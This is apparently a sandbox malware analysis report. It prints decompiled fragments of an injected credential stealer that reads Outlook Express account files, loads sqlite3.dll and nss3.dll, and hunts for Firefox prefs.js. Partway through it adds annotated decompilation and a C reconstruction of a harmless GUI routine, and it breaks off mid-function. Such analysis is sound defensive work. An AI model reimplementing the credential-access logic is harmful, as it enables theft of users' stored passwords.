                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 409945605-0
                                                                                                                                                                        • Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                        • Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
                                                                                                                                                                        • Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                                                                                                                                                                        • Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E00411C05(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				char* _t15;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				long _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t10 = E00405ED5(_a8);
                                                                                                                                                                        				_pop(_t21);
                                                                                                                                                                        				_a8 = _t10;
                                                                                                                                                                        				if(_t10 == 0xffffffff) {
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t27 = GetFileSize(_t10, 0);
                                                                                                                                                                        				_t3 = _t27 + 5; // 0x5
                                                                                                                                                                        				_t13 = _t3;
                                                                                                                                                                        				_push(_t13);
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				_t24 = _t13;
                                                                                                                                                                        				E00406725(_t21, _a8, _t24, _t27);
                                                                                                                                                                        				_t15 = _t24 + _t27;
                                                                                                                                                                        				 *_t15 = 0;
                                                                                                                                                                        				 *((char*)(_t15 + 1)) = 0;
                                                                                                                                                                        				 *((char*)(_t15 + 2)) = 0;
                                                                                                                                                                        				E00411C76(_a4, _t24);
                                                                                                                                                                        				CloseHandle(_a8);
                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
                                                                                                                                                                          • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                                                                                                                                                                        • CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00411C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1968906679-0
                                                                                                                                                                        • Opcode ID: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                        • Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
                                                                                                                                                                        • Opcode Fuzzy Hash: 33877706b5d6ce5a60bd243af652b3227341b80957e1355f9b7c322417ce527a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E0040A5A1(void* __esi) {
                                                                                                                                                                        				void* _v260;
                                                                                                                                                                        				char _v516;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				char* _t16;
                                                                                                                                                                        				signed short _t25;
                                                                                                                                                                        				signed short _t27;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        
                                                                                                                                                                        				_t28 = __esi;
                                                                                                                                                                        				_push(E004087B1( *((intOrPtr*)(__esi + 0x370))));
                                                                                                                                                                        				_t25 = 4;
                                                                                                                                                                        				sprintf( &_v260, E00407A69(_t25));
                                                                                                                                                                        				_t16 = E00408D4B( *((intOrPtr*)(__esi + 0x370)), 0);
                                                                                                                                                                        				if(_t16 > 0) {
                                                                                                                                                                        					_push(_t16);
                                                                                                                                                                        					_t27 = 5;
                                                                                                                                                                        					sprintf( &_v516, E00407A69(_t27));
                                                                                                                                                                        					_t16 = strcat( &_v260,  &_v516);
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                                                                                                                                        					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                          • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                                                                                                                                                                          • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
                                                                                                                                                                          • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                        • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 919693953-0
                                                                                                                                                                        • Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                        • Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
                                                                                                                                                                        • Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E0040FA2B(char* _a4) {
                                                                                                                                                                        				void _v267;
                                                                                                                                                                        				char _v268;
                                                                                                                                                                        				int _t12;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        
                                                                                                                                                                        				_v268 = 0;
                                                                                                                                                                        				memset( &_v267, 0, 0x104);
                                                                                                                                                                        				_t12 = strlen(_a4);
                                                                                                                                                                        				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                                                                                                                                        				if(_t12 + _t5 >= 0x104) {
                                                                                                                                                                        					_v268 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E004062B7( &_v268, _a4, "sqlite3.dll");
                                                                                                                                                                        				}
                                                                                                                                                                        				_t16 = E00406155( &_v268);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~( ~_t16);
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040fa46
                                                                                                                                                                        0x0040fa4d
                                                                                                                                                                        0x0040fa55
                                                                                                                                                                        0x0040fa67
                                                                                                                                                                        0x0040fa70
                                                                                                                                                                        0x0040fa85
                                                                                                                                                                        0x0040fa72
                                                                                                                                                                        0x0040fa7c
                                                                                                                                                                        0x0040fa82
                                                                                                                                                                        0x0040fa93
                                                                                                                                                                        0x0040fa9c
                                                                                                                                                                        0x0040faa3

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040FA4D
                                                                                                                                                                        • strlen.MSVCRT ref: 0040FA55
                                                                                                                                                                        • strlen.MSVCRT ref: 0040FA62
                                                                                                                                                                          • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                          • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$memsetstrcatstrcpy
                                                                                                                                                                        • String ID: sqlite3.dll
                                                                                                                                                                        • API String ID: 1581230619-1155512374
                                                                                                                                                                        • Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                        • Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                                                                                                                                                                        • Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00409A67(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				void _v259;
                                                                                                                                                                        				char _v260;
                                                                                                                                                                        				void _v515;
                                                                                                                                                                        				char _v516;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t15;
                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                        				char* _t26;
                                                                                                                                                                        
                                                                                                                                                                        				_t24 = __ecx;
                                                                                                                                                                        				_v260 = 0;
                                                                                                                                                                        				memset( &_v259, 0, 0xfe);
                                                                                                                                                                        				_v516 = 0;
                                                                                                                                                                        				memset( &_v515, 0, 0xfe);
                                                                                                                                                                        				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                                                                                                                                        				_t26 =  &_v260;
                                                                                                                                                                        				E0040918B(_t26, _t15);
                                                                                                                                                                        				sprintf( &_v516, "</%s>\r\n", _t26);
                                                                                                                                                                        				return E00405F07(_a4,  &_v516);
                                                                                                                                                                        			}
                                                                                                                                                                        0x00409a81
                                                                                                                                                                        0x00409a83
                                                                                                                                                                        0x00409a8a
                                                                                                                                                                        0x00409a99
                                                                                                                                                                        0x00409aa0
                                                                                                                                                                        0x00409aac
                                                                                                                                                                        0x00409ab0
                                                                                                                                                                        0x00409ab6
                                                                                                                                                                        0x00409aca
                                                                                                                                                                        0x00409ae4

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00409A8A
                                                                                                                                                                        • memset.MSVCRT ref: 00409AA0
                                                                                                                                                                          • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                          • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409ACA
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                        • String ID: </%s>
                                                                                                                                                                        • API String ID: 3202206310-259020660
                                                                                                                                                                        • Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                                                                                                                                                                        • Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
                                                                                                                                                                        • Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                                                                                                                                                                        • Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E004021E0(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t36;
                                                                                                                                                                        				signed short _t42;
                                                                                                                                                                        				char* _t47;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = _a4;
                                                                                                                                                                        				_t57 = _t22 - 6;
                                                                                                                                                                        				_t47 = _a8;
                                                                                                                                                                        				_t48 = __ecx;
                                                                                                                                                                        				 *_t47 = 0;
                                                                                                                                                                        				if(_t57 > 0) {
                                                                                                                                                                        					_t23 = _t22 - 7;
                                                                                                                                                                        					if(_t23 == 0) {
                                                                                                                                                                        						return __ecx + 0x214;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t25 = _t23 - 1;
                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                        						return __ecx + 0x294;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t27 = _t25 - 1;
                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                        						return __ecx + 0x314;
		}
		_t29 = _t27 - 1;
		if(_t29 == 0) {
			_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
			if(_t49 < 1 || _t49 > 7) {
				if(_t49 < 8 || _t49 > 0xe) {
					if(_t49 < 0xf || _t49 > 0x19) {
						if(_t49 < 0x1a || _t49 > 0x2d) {
							if(_t49 < 0x2e) {
								L16:
								return _t47;
							}
							_t42 = 0x519;
						} else {
							_t42 = 0x518;
						}
					} else {
						_t42 = 0x517;
					}
				} else {
					_t42 = 0x516;
				}
				goto L20;
			} else {
				_t42 = 0x515;
				L20:
				return E00407A69(_t42);
			}
		}
		_t32 = _t29 - 1;
		if(_t32 == 0) {
			return __ecx + 0x190;
		}
		if(_t32 != 1) {
			goto L16;
		}
		_t50 =  *((intOrPtr*)(__ecx + 0x39c));
		L14:
		if(_t50 != 0) {
			_push(0xa);
			_push(_t47);
			_push(_t50);
			L0041203C();
		}
		goto L16;
	}
	if(_t57 == 0) {
		_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
		goto L20;
	}
	if(_t22 == 0xfffffff6) {
		_t36 = E00407A69( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
		sprintf(_t47, "%s  %s  %s", E00407A69( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
		goto L16;
	}
	if(_t22 == 0) {
		return __ecx + 0xc;
	}
	if(_t22 == 1) {
		_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
		goto L20;
	}
	if(_t22 == 2) {
		return __ecx + 0x90;
	}
	if(_t22 == 3) {
		return __ecx + 0x110;
	}
	if(_t22 == 4) {
		_t50 =  *((intOrPtr*)(__ecx + 0x394));
		goto L14;
	}
	if(_t22 != 5) {
		goto L16;
	}
	if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
		_push(0x10);
	} else {
		_push(0xf);
	}
	_pop(_t42);
	goto L20;
}

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ultoasprintf
                                                                                                                                                                        • String ID: %s %s %s
                                                                                                                                                                        • API String ID: 432394123-3850900253
                                                                                                                                                                        • Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                        • Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
                                                                                                                                                                        • Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                        • Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
			/* Restores a list-view's column widths and column order from a saved layout.
			   __esi points at an object holding { entry* items (+0), int count (+4) }; each
			   4-byte entry is { u16 width (+0), s16 order (+2) }. _a4 is the list-view HWND.
			   _v40.._v12 together form one LVCOLUMNA on the stack (mask, fmt, cx, pszText,
			   cchTextMax [unset], iSubItem, iImage, iOrder); 0x101a is LVM_SETCOLUMNA. */
			E0040851B(intOrPtr* __esi, struct HWND__* _a4) {
				long _v12;        /* LVCOLUMN.iOrder */
				int _v16;         /* LVCOLUMN.iImage */
				int _v20;         /* LVCOLUMN.iSubItem */
				int _v28;         /* LVCOLUMN.pszText */
				signed int _v32;  /* LVCOLUMN.cx (width) */
				int _v36;         /* LVCOLUMN.fmt */
				void* _v40;       /* LVCOLUMN.mask */
				long _t16;
				intOrPtr _t22;
				void* _t24;
				signed int _t25;
				void* _t26;
				int _t27;
				intOrPtr* _t28;

				_t28 = __esi;
				if(_a4 == 0) {
					L12:
					return _t16;
				}
				_t22 =  *((intOrPtr*)(__esi + 4));   /* column count */
				_t26 = 0;
				_t24 = 0;
				/* Decompiler layout note: the block under this test is label L6, which the
				   validation pass further down also reaches via goto L6 when count > 0. */
				if(_t22 <= 0) {
					L6:
					_t27 = 0;
					if(_t22 <= 0) {
						goto L12;
					} else {
						goto L7;
					}
					/* Second pass: apply every sane entry to its column. */
					do {
						L7:
						_t16 =  *_t28 + _t27 * 4;           /* &items[_t27] */
						_t25 =  *_t16 & 0x0000ffff;          /* saved width */
						if(_t25 >= 0 && _t25 < 0x7d0) {      /* width < 2000; the >= 0 test is always true */
							_t16 =  *((short*)(_t16 + 2));   /* saved order, signed */
							if(_t16 < _t22) {                /* order must be below count; negative values pass */
								_v12 = _t16;   /* iOrder */
								_v40 = 0x22;   /* mask = LVCF_WIDTH | LVCF_ORDER */
								_v32 = _t25;   /* cx */
								_v36 = 0;
								_v28 = 0;
								_v20 = 0;
								_v16 = 0;
								_t16 = SendMessageA(_a4, 0x101a, _t27,  &_v40);   /* LVM_SETCOLUMNA on column _t27 */
							}
						}
						_t22 =  *((intOrPtr*)(_t28 + 4));
						_t27 = _t27 + 1;
					} while (_t27 < _t22);
					goto L12;
				}
				/* First pass: walk the order fields; two or more entries with order 0 mean
				   the layout was never saved or is corrupt, so leave the control untouched. */
				_t16 =  *__esi + 2;
				do {
					if( *_t16 != 0) {
						goto L5;
					}
					_t26 = _t26 + 1;
					if(_t26 >= 2) {
						goto L12;
					}
					L5:
					_t24 = _t24 + 1;
					_t16 = _t16 + 4;
				} while (_t24 < _t22);
				goto L6;
			}
Instruction address column for E0040851B: 0x0040851b 0x00408528 0x004085a8 0x004085a8 0x004085a8 0x0040852a 0x0040852d 0x0040852f 0x00408533 0x0040854c 0x0040854c 0x00408550 0x00000000 0x00000000 0x00000000 0x00000000 0x00408552 0x00408552 0x00408554 0x00408557 0x0040855d 0x00408566 0x0040856c 0x0040856e 0x00408581 0x00408588 0x0040858b 0x0040858e 0x00408591 0x00408594 0x00408597 0x00408597 0x0040856c 0x0040859d 0x004085a0 0x004085a1 0x00000000 0x00408552 0x00408538 0x00408539 0x0040853c 0x00000000 0x00000000 0x0040853e 0x00408542 0x00000000 0x00000000 0x00408544 0x00408544 0x00408545 0x00408548 0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageA.USER32(?,0000101A,00000000,?), ref: 00408597
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: "$\LA
                                                                                                                                                                        • API String ID: 3850602802-1791104459
                                                                                                                                                                        • Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                        • Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
                                                                                                                                                                        • Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                        • Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
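The routine above is GUI housekeeping rather than credential access: it replays a saved list-view column layout through LVM_SETCOLUMNA, which is the kind of boilerplate one expects in the password-recovery tool code this dump matched (see the MailPassView / WebBrowserPassView Yara hits). The following is an added, host-independent reconstruction of its logic, not code from the report or from the sample: the Win32 constants are the real values, the entry and object layouts follow the decompilation, and USER32!SendMessageA is replaced by a callback so the validation behaviour can be exercised on constructed layouts. The sample arrays, the fake HWND value and the return convention (count of columns applied, -1 on rejection, whereas the original returns whatever is left in eax) are this example's own choices.

```c
/* Reconstruction of E0040851B: restore list-view column width/order from a
 * packed array of (u16 width, s16 order) entries. Added example, not the
 * sample's code; SendMessageA is abstracted so it runs on any host. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LVM_FIRST      0x1000
#define LVM_SETCOLUMNA (LVM_FIRST + 26)   /* 0x101A, the message in the decompilation */
#define LVCF_WIDTH     0x0002
#define LVCF_ORDER     0x0020             /* 0x22 == LVCF_WIDTH | LVCF_ORDER */
#define MAX_COL_WIDTH  0x7d0              /* 2000 px sanity bound used by the sample */

/* Field order of Win32 LVCOLUMNA (the sample's _v40.._v12 stack block). */
typedef struct {
    uint32_t mask;
    int32_t  fmt;
    int32_t  cx;
    char    *pszText;
    int32_t  cchTextMax;
    int32_t  iSubItem;
    int32_t  iImage;
    int32_t  iOrder;
} lvcolumn_t;

/* One 4-byte saved entry: width at +0, order at +2. */
typedef struct { uint16_t width; int16_t order; } col_setting_t;

/* The object reached through __esi: item pointer at +0, count at +4. */
typedef struct { const col_setting_t *items; int count; } col_settings_t;

/* Stand-in for SendMessageA(hwnd, LVM_SETCOLUMNA, iCol, &lvc). */
typedef long (*send_fn)(void *hwnd, unsigned msg, int wparam, const lvcolumn_t *lvc);

/* Returns the number of columns applied, or -1 when the layout is rejected. */
int restore_columns(const col_settings_t *s, void *hwnd, send_fn send)
{
    if (hwnd == NULL) return -1;                 /* original: _a4 == 0 -> return */

    /* First pass (0x408538..0x408548): two or more entries whose order is 0
       mean an unsaved or corrupt layout; bail before touching the control. */
    int zero_orders = 0;
    for (int i = 0; i < s->count; i++)
        if (s->items[i].order == 0 && ++zero_orders >= 2) return -1;

    /* Second pass (0x408552..0x4085a1): apply every sane entry. */
    int applied = 0;
    for (int i = 0; i < s->count; i++) {
        uint16_t width = s->items[i].width;
        int16_t  order = s->items[i].order;
        /* width < 0x7d0 and order < count; negative orders slip through, as in the sample */
        if (width >= MAX_COL_WIDTH || order >= s->count) continue;
        lvcolumn_t lvc;
        memset(&lvc, 0, sizeof lvc);
        lvc.mask   = LVCF_WIDTH | LVCF_ORDER;    /* _v40 = 0x22 */
        lvc.cx     = width;                      /* _v32 */
        lvc.iOrder = order;                      /* _v12 */
        send(hwnd, LVM_SETCOLUMNA, i, &lvc);
        applied++;
    }
    return applied;
}

/* Recording callback used in place of the real USER32 call. */
static int        g_calls;
static int        g_last_col;
static lvcolumn_t g_last;
static long record_send(void *hwnd, unsigned msg, int wparam, const lvcolumn_t *lvc)
{
    (void)hwnd;
    g_calls++;
    g_last_col = wparam;
    g_last = *lvc;
    return msg == LVM_SETCOLUMNA;
}

/* Constructed layouts (not taken from the sample's memory). */
static const col_setting_t sample_ok[]  = { {120, 1}, {80, 0}, {3000, 2}, {50, 5} };
static const col_setting_t sample_bad[] = { {120, 0}, {80, 0}, {60, 1} };
static void *const FAKE_HWND = (void *)1;   /* any non-NULL value; never dereferenced */

int demo_ok(void)   { col_settings_t s = { sample_ok, 4 };  g_calls = 0; return restore_columns(&s, FAKE_HWND, record_send); }
int demo_bad(void)  { col_settings_t s = { sample_bad, 3 }; g_calls = 0; return restore_columns(&s, FAKE_HWND, record_send); }
int demo_null(void) { col_settings_t s = { sample_ok, 4 };  g_calls = 0; return restore_columns(&s, NULL, record_send); }

int main(void)
{
    printf("valid layout: %d columns applied in %d LVM_SETCOLUMNA calls\n", demo_ok(), g_calls);
    printf("layout with two zero orders: %d\n", demo_bad());
    printf("NULL window handle: %d\n", demo_null());
    return 0;
}
```

In the constructed layout the 3000-pixel entry and the entry whose order (5) exceeds the column count are dropped, so only two LVM_SETCOLUMNA calls are made; the three-entry layout with two zero orders is refused outright. When triaging the hollowed vbc.exe image, functions with this shape can be set aside as tool UI code so that effort goes to the file and registry access paths the report flags for credential theft.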

                                                                                                                                                                        C-Code - Quality: 90%
			/* Directory walk: enumerates "*.*" under _a4, with _a8 as a depth argument.
			   _v1300 is initialised to -1 (INVALID_HANDLE_VALUE) and sits directly below a
			   large buffer, which is consistent with a find-handle plus find-data pair, so
			   E00406FD2 / E0040702D / E00406F97 are most likely the begin / next / is-directory
			   wrappers of that enumeration (interpretation; the wrappers are not shown here). */
			E0040D9D8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				void* _t42;
				intOrPtr* _t44;

				_t42 = __edx;
				_v1300 = _v1300 | 0xffffffff;   /* handle = -1 (INVALID_HANDLE_VALUE) */
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t44 = __ecx;
				E00406FD2( &_v1300, __eflags, "*.*", _a4);   /* start enumerating _a4\*.* */
				while(E0040702D( &_v1300) != 0) {            /* next entry */
					__eflags = E00406F97( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
                                                                                                                                                                        							_push("prefs.js");
                                                                                                                                                                        							_push(_t26);
                                                                                                                                                                        							L00412072();
                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                        							if(_t26 == 0) {
                                                                                                                                                                        								__eflags = E00406155( &_v652);
                                                                                                                                                                        								if(__eflags != 0) {
